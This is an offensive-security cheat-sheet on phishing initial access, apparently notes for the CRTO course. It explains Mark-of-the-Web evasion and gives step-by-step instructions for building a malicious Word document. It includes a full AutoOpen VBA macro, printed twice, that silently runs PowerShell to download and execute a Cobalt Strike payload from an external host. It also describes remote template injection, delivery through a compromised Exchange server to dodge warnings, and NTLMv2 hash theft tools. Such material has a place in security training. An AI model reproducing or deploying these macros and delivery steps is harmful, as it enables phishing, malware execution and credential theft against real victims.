Phishing Tecniques

Important: Phishing Payload Delivery & MOTW

• Two main methods:

  1. URL download: File gets MOTW (ZoneId=3 for Internet). Triggers security warnings (SmartScreen/Protected View).

  2. Email attachment: No MOTW if sent internally (via compromised Exchange). Fewer warnings, higher success rate.

• MOTW: Marks untrusted downloads (via browser). Blocks macros by default in Office. Zones:

  • 0: Local | 1: Intranet | 2: Trusted | 3: Internet | 4: Restricted.

• Key takeaway: Attachments (no MOTW) evade more defenses than URL downloads.

Word Malicious Macro with Cobalt Strike

Simple Macro

1. Create a blank document

2. View > Macros > Select document

3. Generate a payload (Cobalt Strike Example for CRTO) RevShells.com

   1. Attacks > Scripted Web Delivery (S)

      1. Set URI Path

      2. Set Host (nickelviper.com)

      3. Set Port (80)

      4. Set Listener HTTP/DNS

      5. Set type: Powershell

      6. Enable Use X64 Payload

         1. Copy the payload and set it into the macro.

Sub AutoOpen()

  Dim Shell As Object
  Set Shell = CreateObject("wscript.shell")
	Shell.Run "powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://nickelviper.com/a'))"""

End Sub

1. Save as .doc .

2. Send the file whether via email from a compromise Exchange to avoid the MOTW or any methods you want.

Remote Template injection

1. Create a blank document

2. View > Macros > Select document

3. Generate a payload (Cobalt Strike Example for CRTO) RevShells.com

   1. Attacks > Scripted Web Delivery (S)

      1. Set URI Path

      2. Set Host (nickelviper.com)

      3. Set Port (80)

      4. Set Listener HTTP/DNS

      5. Set type: Powershell

      6. Enable Use X64 Payload

         1. Copy the payload and set it into the macro.

Sub AutoOpen()

  Dim Shell As Object
  Set Shell = CreateObject("wscript.shell")
	Shell.Run "powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://nickelviper.com/a'))"""

End Sub

1. Save as .dot .

2. Host the file (python server|Cobalt Striket Server)

3. Create a new black template

   1. Save as .docx

4. By using 1-zip click on file

   1. Go to Word > _rels > settings.xml.rels

      1. Modify the target parameter within the settings.xml.rels file with the .dot file you created before and is hosted.

5. Send the file whether via email from a compromise Exchange to avoid the MOTW or any methods you want.

OSCP-Cheatsheets/offensive-security/initial-access/phishing-with-ms-office/inject-macros-from-a-remote-dotm-template-docx-with-macros.md at master · albatux/OSCP-CheatsheetsGitHub

Capturing NTLMv2 Hashes

If you see you possess Write permission over public SMB share in your target domain or you see the website accepts uploading files you could use tools such as ntlm_theft to create a malicious files and steal NTLMv2 Hash

GitHub - Greenwolf/ntlm_theft: A tool for generating multiple types of NTLMv2 hash theft files by Jacob Wilkin (Greenwolf)GitHub

Some places to steal NTLMV2 Hashes

Places of Interest in Stealing NetNTLM Hashes | 🔐Blog of Osanda🔐Blog of Osanda